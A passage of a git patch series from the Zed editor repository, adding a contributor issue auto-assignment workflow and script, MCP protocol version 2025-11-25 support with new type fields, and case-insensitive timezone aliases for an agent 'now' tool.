image.data)) + } + } } } @@ -333,7 +341,7 @@ impl CosmicTextSystemState { Source::Outline, ] } else { - &[Source::Outline] + &[Source::Bitmap(StrikeWith::ExactSize), Source::Outline] }; let mut renderer = Render::new(sources); From f3d6b749d67f94052510de0149cd8166726fd84b Mon Sep 17 00:00:00 2001 From: Lena <241371603+zelenenka@users.noreply.github.com> Date: Wed, 29 Apr 2026 15:59:31 +0200 Subject: [PATCH 110/231] Add a broken POC for guild auto-assignment (#55205) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This is mostly to enable testing the github action with the right secrets — the code is atrocious for now. Release notes: - N/A --- .../workflows/assign_contributor_issue.yml | 70 +++ script/github-assign-contributor-issue.py | 421 ++++++++++++++++++ 2 files changed, 491 insertions(+) create mode 100644 .github/workflows/assign_contributor_issue.yml create mode 100644 script/github-assign-contributor-issue.py diff --git a/.github/workflows/assign_contributor_issue.yml b/.github/workflows/assign_contributor_issue.yml new file mode 100644 index 00000000000000..5e968611299e26 --- /dev/null +++ b/.github/workflows/assign_contributor_issue.yml @@ -0,0 +1,70 @@ +# Assign Contributor Issue — auto-assign labeled contributor issues +# +# When an issue has both a `.contrib/good *` label and an `area:` label, +# finds the least-busy contributor interested in that area (via Tally form +# responses), assigns the issue, updates the project board, and notifies +# the contributor on Slack. +# +# Errors and "no candidates" conditions are reported to the Slack activity +# channel. + +name: Assign Contributor Issue + +on: + issues: + types: [labeled] + workflow_dispatch: + inputs: + issue_number: + description: "Issue number to test against" + required: true + type: number + +permissions: + contents: read + +concurrency: + group: assign-contributor-${{ github.event.issue.number || inputs.issue_number }} + cancel-in-progress: true + +jobs: + assign-contributor: + if: >- + github.event_name == 'workflow_dispatch' || + (github.repository == 'zed-industries/zed' && + github.event.issue.state == 'open' && + (startsWith(github.event.label.name, '.contrib/good ') || startsWith(github.event.label.name, 'area:'))) + runs-on: namespace-profile-2x4-ubuntu-2404 + timeout-minutes: 5 + + steps: + - name: Generate app token + id: app-token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 + with: + app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} + private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} + owner: zed-industries + + - name: Checkout repository + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 + with: + sparse-checkout: script/github-assign-contributor-issue.py + sparse-checkout-cone-mode: false + + - name: Set up Python + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0 + with: + python-version: "3.12" + + - name: Install dependencies + run: pip install requests + + - name: Assign contributor + env: + GITHUB_TOKEN: ${{ steps.app-token.outputs.token }} + TALLY_API_KEY: ${{ secrets.TALLY_API_KEY }} + TALLY_FORM_ID: ${{ vars.TALLY_CONTRIBUTOR_FORM_ID }} + SLACK_BOT_TOKEN: ${{ secrets.SLACK_CONTRIBUTOR_BOT_TOKEN }} + ISSUE_NUMBER: ${{ github.event.issue.number || inputs.issue_number }} + run: python script/github-assign-contributor-issue.py "$ISSUE_NUMBER" diff --git a/script/github-assign-contributor-issue.py b/script/github-assign-contributor-issue.py new file mode 100644 index 00000000000000..5b48b46a3df8a3 --- /dev/null +++ b/script/github-assign-contributor-issue.py @@ -0,0 +1,421 @@ +#!/usr/bin/env python3 +""" +Assign a labeled contributor issue to the least-busy interested contributor. + +When an issue has both a `.contrib/good *` label and an `area:` label, this +script: +1. Fetches Tally form responses to find contributors interested in the issue's areas +2. Queries GitHub for each candidate's current open issue assignment count +3. Assigns the issue to the least-busy candidate (random tiebreak) +4. Adds the issue to a GitHub project board with "Assign" status +5. Notifies the assignee via Slack DM and posts to an activity channel + +Errors and notable conditions (no candidates found, API failures) are reported +to the Slack activity channel before the script exits. + +Requires: + requests (pip install requests) + +Usage: + python github-assign-contributor-issue.py + +""" + +import json +import os +import random +import sys + +import requests + +GITHUB_API = "https://api.github.com" +TALLY_API = "https://api.tally.so" +SLACK_API = "https://slack.com/api" + +REPO_OWNER = "zed-industries" +REPO_NAME = "zed" +PROJECT_NUMBER = 83 +SLACK_ACTIVITY_CHANNEL_ID = "C0B0JCE8GDC" + + +def eligible_areas(issue): + """Returns the list of area names if the issue is eligible for assignment, or None.""" + labels = [label["name"] for label in issue["labels"]] + assignees = [a["login"] for a in issue["assignees"]] + + contrib_labels = [name for name in labels if name.startswith(".contrib/good ")] + area_labels = [name for name in labels if name.startswith("area:")] + + if not contrib_labels or not area_labels: + print("Issue needs both a .contrib/good * label and an area: label, skipping") + return None + + if assignees: + print(f"Issue is already assigned to {assignees}, skipping") + return None + + areas = [label.removeprefix("area:") for label in area_labels] + print(f"Areas: {areas}") + return areas + + +# --- Tally --- + + +def fetch_tally_contributors(api_key, form_id): + """Fetch all completed submissions from a Tally form. + + Deduplicates by GitHub username, keeping the latest submission. + """ + headers = {"Authorization": f"Bearer {api_key}"} + contributors = {} + page = 1 + + while True: + response = requests.get( + f"{TALLY_API}/forms/{form_id}/submissions", + headers=headers, + params={"page": page, "limit": 500, "filter": "completed"}, + ) + response.raise_for_status() + data = response.json() + + field_titles = {} + for question in data.get("questions", []): + for field in question.get("fields", []): + field_titles[field["uuid"]] = field.get("title", "") + + questions = {q["id"]: q for q in data.get("questions", [])} + + for submission in data.get("submissions", []): + record = parse_submission(submission, questions, field_titles) + if record: + contributors[record["github_username"].lower()] = record + + if not data.get("hasMore", False): + break + page += 1 + + return list(contributors.values()) + + +def parse_submission(submission, questions, field_titles): + """Parse a single Tally submission into a contributor record. + + Returns a dict with github_username, email (optional), and areas, + or None if the submission is incomplete. + """ + github_username = None + email = None + areas = [] + + for response in submission.get("responses", []): + try: + question_title = questions[response["questionId"]]["title"].lower() + answer = response["answer"] + except KeyError: + continue + + try: + if "github" in question_title: + github_username = str(answer).strip().lstrip("@") + elif "email" in question_title: + email = str(answer).strip().lower() + elif "area" in question_title: + for item in answer if isinstance(answer, list) else [answer]: + area = field_titles.get(item, item).strip() + if area: + areas.append(area) + except (TypeError, AttributeError): + continue + + if not github_username or not areas: + return None + + record = {"github_username": github_username, "areas": areas} + if email: + record["email"] = email + return record + + +def find_candidates(contributors, area_names): + """Find contributors interested in any of the given areas (case-insensitive).""" + target = {name.lower() for name in area_names} + return [c for c in contributors if any(a.lower() in target for a in c["areas"])] + + +def pick_least_busy(github_headers, candidates): + """Pick the candidate with the fewest open assignments (random tiebreak).""" + usernames = [c["github_username"] for c in candidates] + loads = count_open_assignments(github_headers, usernames) + for username, count in loads.items(): + print(f" {username}: {count} open assignments") + + min_load = min(loads.values()) + least_busy = [c for c in candidates if loads[c["github_username"]] == min_load] + chosen = random.choice(least_busy) + print( + f"Selected: {chosen['github_username']} (load: {min_load}, {len(least_busy)} tied)" + ) + return chosen + + +# --- GitHub --- + + +def fetch_issue(headers, issue_number): + """Fetch issue details from the GitHub API.""" + response = requests.get( + f"{GITHUB_API}/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}", + headers=headers, + ) + response.raise_for_status() + return response.json() + + +def count_open_assignments(headers, usernames): + """Count open issues assigned to each user in a single GraphQL request.""" + aliases = [ + f'u{i}: search(query: "repo:{REPO_OWNER}/{REPO_NAME} is:issue is:open assignee:{name}", type: ISSUE) {{ issueCount }}' + for i, name in enumerate(usernames) + ] + query = "query {\n" + "\n".join(aliases) + "\n}" + data = execute_graphql(headers, query, {}) + return {name: data[f"u{i}"]["issueCount"] for i, name in enumerate(usernames)} + + +def assign_issue(headers, issue_number, username): + """Assign a GitHub issue to a user.""" + response = requests.post( + f"{GITHUB_API}/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/assignees", + headers=headers, + json={"assignees": [username]}, + ) + response.raise_for_status() + + +def execute_graphql(headers, query, variables): + """Execute a GitHub GraphQL query. Raises on HTTP or GraphQL errors.""" + response = requests.post( + f"{GITHUB_API}/graphql", + headers=headers, + json={"query": query, "variables": variables}, + ) + response.raise_for_status() + result = response.json() + if "errors" in result: + raise RuntimeError(f"GraphQL error: {result['errors']}") + return result["data"] + + +def fetch_project(headers, project_number): + """Fetch a GitHub project board's metadata including fields and status options.""" + data = execute_graphql( + headers, + """ + query($owner: String!, $number: Int!) { + organization(login: $owner) { + projectV2(number: $number) { + id + fields(first: 50) { + nodes { + ... on ProjectV2SingleSelectField { + id + name + options { id name } + } + } + } + } + } + } + """, + {"owner": REPO_OWNER, "number": project_number}, + ) + return data["organization"]["projectV2"] + + +def add_issue_to_project(headers, project_id, issue_node_id): + """Add an issue to a GitHub project board. Returns the project item ID.""" + data = execute_graphql( + headers, + """ + mutation($projectId: ID!, $contentId: ID!) { + addProjectV2ItemById(input: {projectId: $projectId, contentId: $contentId}) { + item { id } + } + } + """, + {"projectId": project_id, "contentId": issue_node_id}, + ) + item_id = data["addProjectV2ItemById"]["item"]["id"] + print(f"Added issue to project (item: {item_id})") + return item_id + + +def set_project_item_status(headers, project, item_id, status_name): + """Set the Status field on a project item. Hard-fails if the status option is missing.""" + status_field_id = None + option_id = None + for field in project["fields"]["nodes"]: + if field.get("name") == "Status": + status_field_id = field["id"] + for option in field.get("options", []): + if option["name"] == status_name: + option_id = option["id"] + break + break + + if not status_field_id or not option_id: + available = [f.get("name") for f in project["fields"]["nodes"] if f.get("name")] + raise RuntimeError( + f"Could not find Status field with '{status_name}' option. " + f"Fields found: {available}" + ) + + execute_graphql( + headers, + """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $optionId: String!) { + updateProjectV2ItemFieldValue(input: { + projectId: $projectId + itemId: $itemId + fieldId: $fieldId + value: { singleSelectOptionId: $optionId } + }) { + projectV2Item { id } + } + } + """, + { + "projectId": project["id"], + "itemId": item_id, + "fieldId": status_field_id, + "optionId": option_id, + }, + ) + print(f"Set project status to '{status_name}'") + + +# --- Slack --- + + +def slack_post_message(headers, recipient, text): + """Post a message to a Slack channel or user DM.""" + response = requests.post( + f"{SLACK_API}/chat.postMessage", + headers=headers, + json={"channel": recipient, "text": text}, + ) + response.raise_for_status() + data = response.json() + if not data["ok"]: + raise RuntimeError(f"Slack API error: {data['error']}") + + +def find_slack_user_id(headers, email): + """Look up a Slack user ID by email. Returns None if not found.""" + try: + response = requests.get( + f"{SLACK_API}/users.lookupByEmail", + headers=headers, + params={"email": email}, + ) + response.raise_for_status() + return response.json()["user"]["id"] + except (requests.RequestException, KeyError): + return None + + +def post_to_activity(slack_headers, message): + """Best-effort post to the Slack activity channel.""" + try: + slack_post_message(slack_headers, SLACK_ACTIVITY_CHANNEL_ID, message) + except Exception as exc: + print(f"Failed to post to Slack activity channel: {exc}") + + +def notify_assignment(slack_headers, chosen, issue): + """DM the chosen contributor and post to the activity channel.""" + issue_number = issue["number"] + issue_title = issue["title"] + issue_url = issue["html_url"] + chosen_username = chosen["github_username"] + + slack_user_id = find_slack_user_id(slack_headers, chosen.get("email")) + + if slack_user_id: + slack_post_message( + slack_headers, + slack_user_id, + f"\U0001f44b You've been assigned to <{issue_url}|#{issue_number}: {issue_title}>! " + f"This issue matches your areas of interest. " + f"Let us know if you have any questions.", + ) + + activity_message = ( + f"\U0001f4cb <{issue_url}|#{issue_number}: {issue_title}> " + f"assigned to *{chosen_username}*" + ) + if slack_user_id: + activity_message += f" (<@{slack_user_id}>)" + post_to_activity(slack_headers, activity_message) + + +# --- Main --- + + +if __name__ == "__main__": + issue_number = sys.argv[1] + + github_token = os.environ["GITHUB_TOKEN"] + tally_api_key = os.environ["TALLY_API_KEY"] + tally_form_id = os.environ["TALLY_FORM_ID"] + slack_bot_token = os.environ["SLACK_CONTRIBUTOR_ROUTING_BOT_TOKEN"] + + github_headers = { + "Authorization": f"Bearer {github_token}", + "Accept": "application/vnd.github+json", + "X-GitHub-Api-Version": "2022-11-28", + } + slack_headers = { + "Authorization": f"Bearer {slack_bot_token}", + "Content-Type": "application/json", + } + + issue = fetch_issue(github_headers, issue_number) + if not (areas := eligible_areas(issue)): + sys.exit(0) + + try: + contributors = fetch_tally_contributors(tally_api_key, tally_form_id) + print(f"Found {len(contributors)} contributors in Tally") + + candidates = find_candidates(contributors, areas) + if not candidates: + post_to_activity( + slack_headers, + f"\u26a0\ufe0f No contributors found for {', '.join(areas)} \u2014 " + f"<{issue['html_url']}|#{issue_number}: {issue['title']}>", + ) + print(f"No contributors interested in areas: {areas}") + sys.exit(0) + + chosen = pick_least_busy(github_headers, candidates) + + assign_issue(github_headers, issue_number, chosen["github_username"]) + print(f"Assigned #{issue_number} to {chosen['github_username']}") + + project = fetch_project(github_headers, PROJECT_NUMBER) + item_id = add_issue_to_project(github_headers, project["id"], issue["node_id"]) + set_project_item_status(github_headers, project, item_id, "Assigned") + + notify_assignment(slack_headers, chosen, issue) + + except Exception as exc: + post_to_activity( + slack_headers, + f"\u274c Failed to assign contributor for " + f"<{issue['html_url']}|#{issue_number}: {issue['title']}>: {exc}", + ) + raise From 28897fa05a001d3612c86d1cd6306aab51989af4 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Wed, 29 Apr 2026 18:29:48 +0200 Subject: [PATCH 111/231] Support latest MCP protocol version (#54494) Updates our MCP implementation to support `2025-06-18` and `2025-11-25` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54458, #53456 Release Notes: - Support latest MCP version (`2025-11-25`) --- crates/agent/src/tests/mod.rs | 15 +++++ .../src/tools/context_server_registry.rs | 3 + crates/context_server/src/client.rs | 7 +++ crates/context_server/src/context_server.rs | 2 + crates/context_server/src/listener.rs | 1 + crates/context_server/src/protocol.rs | 7 +++ crates/context_server/src/test.rs | 2 + crates/context_server/src/transport.rs | 5 ++ crates/context_server/src/transport/http.rs | 30 ++++++++++ crates/context_server/src/types.rs | 55 ++++++++++++++++++- 10 files changed, 126 insertions(+), 1 deletion(-) diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index 996e753952b6cb..d9f451f135d6bf 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -1457,6 +1457,7 @@ async fn test_mcp_tools(cx: &mut TestAppContext) { "test_server", vec![context_server::types::Tool { name: "echo".into(), + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -1621,6 +1622,7 @@ async fn test_mcp_tool_multi_content_response(cx: &mut TestAppContext) { "screenshot_server", vec![context_server::types::Tool { name: "screenshot".into(), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1742,6 +1744,7 @@ async fn test_mcp_tool_result_displayed_when_server_disconnected(cx: &mut TestAp "github_server", vec![context_server::types::Tool { name: "issue_read".into(), + title: None, description: Some("Read a GitHub issue".into()), input_schema: json!({ "type": "object", @@ -1936,6 +1939,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { vec![ context_server::types::Tool { name: "echo".into(), // Conflicts with native EchoTool + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -1946,6 +1950,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "unique_tool_1".into(), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1961,6 +1966,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { vec![ context_server::types::Tool { name: "echo".into(), // Also conflicts with native EchoTool + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -1971,6 +1977,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "unique_tool_2".into(), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1978,6 +1985,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "a".repeat(MAX_TOOL_NAME_LENGTH - 2), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1985,6 +1993,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "b".repeat(MAX_TOOL_NAME_LENGTH - 1), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1999,6 +2008,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { vec![ context_server::types::Tool { name: "a".repeat(MAX_TOOL_NAME_LENGTH - 2), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -2006,6 +2016,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "b".repeat(MAX_TOOL_NAME_LENGTH - 1), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -2013,6 +2024,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "c".repeat(MAX_TOOL_NAME_LENGTH + 1), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -2028,6 +2040,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { "Azure DevOps", vec![context_server::types::Tool { name: "echo".into(), // Also conflicts - will be disambiguated as azure_dev_ops_echo + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -4406,7 +4419,9 @@ fn setup_context_server( ), server_info: context_server::types::Implementation { name: name.into(), + title: None, version: "1.0.0".to_string(), + description: None, }, capabilities: context_server::types::ServerCapabilities { tools: Some(context_server::types::ToolsCapabilities { diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 261c89e6b80e7d..9948b587f4fcec 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -410,6 +410,9 @@ impl AnyAgentTool for ContextServerTool { context_server::types::ToolResponseContent::Resource { .. } => { log::warn!("Ignoring resource content from tool response"); } + context_server::types::ToolResponseContent::ResourceLink { .. } => { + log::warn!("Ignoring resource link content from tool response"); + } } } let raw_output = serde_json::Value::String(concatenated_text); diff --git a/crates/context_server/src/client.rs b/crates/context_server/src/client.rs index 676baef97326b4..1c433d9fd345c5 100644 --- a/crates/context_server/src/client.rs +++ b/crates/context_server/src/client.rs @@ -474,6 +474,13 @@ impl Client { Ok(()) } + /// Notify the underlying transport of the negotiated MCP protocol version + /// so it can stamp subsequent requests (e.g. HTTP's `MCP-Protocol-Version` + /// header required from 2025-06-18 onward). + pub(crate) fn set_protocol_version(&self, version: &str) { + self.transport.set_protocol_version(version); + } + #[must_use] pub fn on_notification( &self, diff --git a/crates/context_server/src/context_server.rs b/crates/context_server/src/context_server.rs index e7e063efa9d6e9..05a3451ea863a3 100644 --- a/crates/context_server/src/context_server.rs +++ b/crates/context_server/src/context_server.rs @@ -138,7 +138,9 @@ impl ContextServer { let protocol = crate::protocol::ModelContextProtocol::new(client); let client_info = types::Implementation { name: "Zed".to_string(), + title: None, version: env!("CARGO_PKG_VERSION").to_string(), + description: None, }; let initialized_protocol = protocol.initialize(client_info).await?; diff --git a/crates/context_server/src/listener.rs b/crates/context_server/src/listener.rs index 2e395e493cc98a..a9be4c07a26dc6 100644 --- a/crates/context_server/src/listener.rs +++ b/crates/context_server/src/listener.rs @@ -103,6 +103,7 @@ impl McpServer { let registered_tool = RegisteredTool { tool: Tool { name: T::NAME.into(), + title: None, description, input_schema: input_schema.into(), output_schema: if TypeId::of::() == TypeId::of::<()>() { diff --git a/crates/context_server/src/protocol.rs b/crates/context_server/src/protocol.rs index a218a8a3e0e635..05082637c276ff 100644 --- a/crates/context_server/src/protocol.rs +++ b/crates/context_server/src/protocol.rs @@ -27,6 +27,8 @@ impl ModelContextProtocol { fn supported_protocols() -> Vec { vec![ types::ProtocolVersion(types::LATEST_PROTOCOL_VERSION.to_string()), + types::ProtocolVersion(types::VERSION_2025_06_18.to_string()), + types::ProtocolVersion(types::VERSION_2025_03_26.to_string()), types::ProtocolVersion(types::VERSION_2024_11_05.to_string()), ] } @@ -59,6 +61,11 @@ impl ModelContextProtocol { log::trace!("mcp server info {:?}", response.server_info); + // Per MCP 2025-06-18, HTTP transport must attach the negotiated version + // as `MCP-Protocol-Version` on every post-initialize request. + self.inner + .set_protocol_version(&response.protocol_version.0); + let initialized_protocol = InitializedContextServerProtocol { inner: self.inner, initialize: response, diff --git a/crates/context_server/src/test.rs b/crates/context_server/src/test.rs index 008542ab246bc2..b1e457975f916d 100644 --- a/crates/context_server/src/test.rs +++ b/crates/context_server/src/test.rs @@ -27,7 +27,9 @@ fn create_initialize_response(server_name: String) -> InitializeResponse { protocol_version: ProtocolVersion(crate::types::LATEST_PROTOCOL_VERSION.to_string()), server_info: Implementation { name: server_name, + title: None, version: "1.0.0".to_string(), + description: None, }, capabilities: ServerCapabilities::default(), meta: None, diff --git a/crates/context_server/src/transport.rs b/crates/context_server/src/transport.rs index a3d6f998d49872..bffd7e4c4d84a8 100644 --- a/crates/context_server/src/transport.rs +++ b/crates/context_server/src/transport.rs @@ -14,4 +14,9 @@ pub trait Transport: Send + Sync { async fn send(&self, message: String) -> Result<()>; fn receive(&self) -> Pin + Send>>; fn receive_err(&self) -> Pin + Send>>; + + /// Called after the MCP initialize handshake completes so transports that + /// need the negotiated version (currently only HTTP, which must attach an + /// `MCP-Protocol-Version` header from 2025-06-18 onward) can pick it up. + fn set_protocol_version(&self, _version: &str) {} } diff --git a/crates/context_server/src/transport/http.rs b/crates/context_server/src/transport/http.rs index 47e31c7abc7b1d..bf374586b35fb5 100644 --- a/crates/context_server/src/transport/http.rs +++ b/crates/context_server/src/transport/http.rs @@ -9,6 +9,7 @@ use std::{pin::Pin, sync::Arc}; use crate::oauth::{self, OAuthTokenProvider, WwwAuthenticate}; use crate::transport::Transport; +use crate::types; /// Typed errors returned by the HTTP transport that callers can downcast from /// `anyhow::Error` to handle specific failure modes. @@ -33,6 +34,7 @@ impl std::error::Error for TransportError {} // Constants from MCP spec const HEADER_SESSION_ID: &str = "Mcp-Session-Id"; +const HEADER_PROTOCOL_VERSION: &str = "MCP-Protocol-Version"; const EVENT_STREAM_MIME_TYPE: &str = "text/event-stream"; const JSON_MIME_TYPE: &str = "application/json"; @@ -41,6 +43,11 @@ pub struct HttpTransport { http_client: Arc, endpoint: String, session_id: Arc>>, + /// Negotiated MCP protocol version, populated by `set_protocol_version` + /// after the initialize handshake. From 2025-06-18 onward the server + /// requires clients to echo this in the `MCP-Protocol-Version` header on + /// every subsequent request. + protocol_version: Arc>>, executor: BackgroundExecutor, response_tx: async_channel::Sender, response_rx: async_channel::Receiver, @@ -78,6 +85,7 @@ impl HttpTransport { executor, endpoint, session_id: Arc::new(SyncMutex::new(None)), + protocol_version: Arc::new(SyncMutex::new(None)), response_tx, response_rx, error_tx, @@ -114,6 +122,14 @@ impl HttpTransport { request_builder = request_builder.header(HEADER_SESSION_ID, session_id.as_str()); } + // Echo the negotiated protocol version once initialization has + // completed. Required by servers speaking MCP 2025-06-18 or later. + if let Some(ref version) = *self.protocol_version.lock() + && types::requires_protocol_version_header(version) + { + request_builder = request_builder.header(HEADER_PROTOCOL_VERSION, version.as_str()); + } + Ok(request_builder.body(AsyncBody::from(message.to_vec()))?) } @@ -315,6 +331,10 @@ impl Transport for HttpTransport { fn receive_err(&self) -> Pin + Send>> { Box::pin(self.error_rx.clone()) } + + fn set_protocol_version(&self, version: &str) { + *self.protocol_version.lock() = Some(version.to_string()); + } } impl Drop for HttpTransport { @@ -323,6 +343,7 @@ impl Drop for HttpTransport { let http_client = self.http_client.clone(); let endpoint = self.endpoint.clone(); let session_id = self.session_id.lock().clone(); + let protocol_version = self.protocol_version.lock().clone(); let headers = self.headers.clone(); let access_token = self.token_provider.as_ref().and_then(|p| p.access_token()); @@ -345,6 +366,15 @@ impl Drop for HttpTransport { request_builder.header("Authorization", format!("Bearer {}", token)); } + // Stamp the negotiated MCP protocol version on the DELETE + // too, matching what `build_request` does for POSTs. + if let Some(ref version) = protocol_version + && types::requires_protocol_version_header(version) + { + request_builder = + request_builder.header(HEADER_PROTOCOL_VERSION, version.as_str()); + } + let request = request_builder.body(AsyncBody::empty()); if let Ok(request) = request { diff --git a/crates/context_server/src/types.rs b/crates/context_server/src/types.rs index 81a427a289347a..803f11b4ccd92f 100644 --- a/crates/context_server/src/types.rs +++ b/crates/context_server/src/types.rs @@ -5,8 +5,16 @@ use url::Url; use crate::client::RequestId; -pub const LATEST_PROTOCOL_VERSION: &str = "2025-03-26"; pub const VERSION_2024_11_05: &str = "2024-11-05"; +pub const VERSION_2025_03_26: &str = "2025-03-26"; +pub const VERSION_2025_06_18: &str = "2025-06-18"; +pub const LATEST_PROTOCOL_VERSION: &str = "2025-11-25"; + +/// Protocol versions that include the streamable HTTP transport's +/// `MCP-Protocol-Version` header requirement on post-initialize requests. +pub fn requires_protocol_version_header(version: &str) -> bool { + matches!(version, VERSION_2025_06_18 | LATEST_PROTOCOL_VERSION) +} pub mod requests { use super::*; @@ -209,10 +217,21 @@ pub struct CompletionCompleteParams { #[serde(rename = "ref")] pub reference: CompletionReference, pub argument: CompletionArgument, + /// Previously-resolved argument values so the server can provide + /// context-sensitive completions (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub context: Option, #[serde(rename = "_meta", skip_serializing_if = "Option::is_none")] pub meta: Option>, } +#[derive(Debug, Serialize, Deserialize)] +#[serde(rename_all = "camelCase")] +pub struct CompletionContext { + #[serde(skip_serializing_if = "Option::is_none")] + pub arguments: Option>, +} + #[derive(Debug, Serialize, Deserialize)] #[serde(untagged)] pub enum CompletionReference { @@ -421,6 +440,9 @@ pub struct CompletionResult { #[serde(rename_all = "camelCase")] pub struct Prompt { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -431,6 +453,9 @@ pub struct Prompt { #[serde(rename_all = "camelCase")] pub struct PromptArgument { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -499,6 +524,9 @@ pub struct RootsCapabilities { #[serde(rename_all = "camelCase")] pub struct Tool { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, pub input_schema: serde_json::Value, @@ -532,7 +560,13 @@ pub struct ToolAnnotations { #[serde(rename_all = "camelCase")] pub struct Implementation { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, pub version: String, + /// Human-readable description of the implementation (added in MCP 2025-11-25). + #[serde(skip_serializing_if = "Option::is_none")] + pub description: Option, } #[derive(Debug, Serialize, Deserialize)] @@ -540,6 +574,9 @@ pub struct Implementation { pub struct Resource { pub uri: Url, pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -577,6 +614,9 @@ pub struct BlobResourceContents { pub struct ResourceTemplate { pub uri_template: String, pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -709,6 +749,19 @@ pub enum ToolResponseContent { Audio { data: String, mime_type: String }, #[serde(rename = "resource")] Resource { resource: ResourceContents }, + /// Link to an MCP resource on the server, without inlining its contents. + /// Added in MCP 2025-06-18. + #[serde(rename = "resource_link", rename_all = "camelCase")] + ResourceLink { + uri: Url, + name: String, + #[serde(skip_serializing_if = "Option::is_none")] + title: Option, + #[serde(skip_serializing_if = "Option::is_none")] + description: Option, + #[serde(skip_serializing_if = "Option::is_none")] + mime_type: Option, + }, } impl ToolResponseContent { From 491f8dc9e0fb8e04d9a67ade0ddfc73b64a9209f Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Thu, 30 Apr 2026 12:15:36 +0300 Subject: [PATCH 112/231] tools: Make time-zones more case-insensitive (#55288) gpt-5.5 likes to call the `now` tool with upper-case "UTC", leading to this error: > Failed to receive tool input: tool input was not fully received Release Notes: - N/A --- crates/agent/src/tools/now_tool.rs | 2 ++ 1 file changed, 2 insertions(+) diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index 04aba44ff3a1f4..9721c923b6e8d2 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -13,8 +13,10 @@ use crate::{AgentTool, ToolCallEventStream, ToolInput}; #[schemars(inline)] pub enum Timezone { /// Use UTC for the datetime. + #[serde(alias = "UTC", alias = "Utc")] Utc, /// Use local time for the datetime. + #[serde(alias = "LOCAL", alias = "Local")] Local, } From b3d5bf07ad4b944d2b478773c81ac1915767c8f2 Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Thu, 30 Apr 2026 06:10:14 -0500 Subject: [PATCH 113/231] 